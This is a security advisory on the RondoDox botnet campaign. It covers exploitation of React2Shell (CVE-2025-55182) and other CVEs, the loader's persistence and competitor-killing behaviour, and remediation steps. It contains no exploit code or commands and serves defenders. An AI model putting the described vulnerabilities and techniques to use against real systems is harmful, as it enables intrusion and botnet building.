Severity
High
Analysis Summary
Cybersecurity researchers have uncovered a nine-month-long malicious campaign that has targeted Internet of Things (IoT) devices and web applications to build a botnet known as RondoDox. Active since early 2025, the campaign has steadily expanded in scale and sophistication, leveraging both newly disclosed and previously known vulnerabilities to compromise systems.
As of December 2025, attackers have been observed exploiting a critical vulnerability dubbed React2Shell (CVE-2025-55182) as a primary initial access vector. This flaw affects React Server Components (RSC) and Next.js, allowing unauthenticated remote code execution on vulnerable servers. According to the security firm, approximately 90,300 instances remain exposed worldwide, with the majority located in the United States, followed by Germany, France, and India.
RondoDox has incorporated multiple N-day vulnerabilities into its exploitation toolkit, including CVE-2023-1389 and CVE-2025-24893, to maximize infection opportunities. Prior abuse of React2Shell for botnet propagation was independently reported by multiple security researchers, reinforcing the credibility of the findings.
The campaign progressed through three distinct phases: initial reconnaissance and manual scanning (March–April 2025), daily mass vulnerability probing of web platforms such as WordPress, Drupal, Struts2, and IoT devices like Wavlink routers (April–June 2025), followed by hourly automated exploitation at scale from July through early December 2025.
In December 2025 attacks, threat actors scanned for vulnerable Next.js servers and deployed multiple payloads, including cryptocurrency miners, a botnet loader and health-check component, and a Mirai-based botnet variant. One loader module aggressively removes competing malware, terminates non-whitelisted processes every 45 seconds, establishes persistence via cron jobs, and prevents reinfection by rival actors.
To mitigate risk, organizations are advised to promptly patch Next.js, segment IoT devices into isolated VLANs, deploy Web Application Firewalls (WAFs), monitor suspicious process activity, and block known command-and-control infrastructure.
Impact
- Remote Code Execution
- Unauthorized Access
- Reconnaissance
Remediation
- Patch Next.js and React Server Components to eliminate the React2Shell (CVE-2025-55182) remote code execution risk
- Apply security updates for all affected N-day vulnerabilities (e.g., CVE-2023-1389, CVE-2025-24893) to reduce attack surface
- Segment IoT devices into dedicated VLANs to limit lateral movement and botnet propagation
- Deploy a Web Application Firewall (WAF) to block exploitation attempts against web applications
- Restrict internet exposure of admin panels and development servers to reduce unauthenticated access
- Monitor systems for suspicious process execution and unknown binaries (e.g., crypto miners and botnet loaders)
- Detect and remove malicious cron jobs to prevent persistence mechanisms
- Block known command-and-control (C2) infrastructure at network and firewall levels
- Implement continuous vulnerability scanning to identify exposed and outdated services
- Enable centralized logging and alerting to detect early signs of botnet activity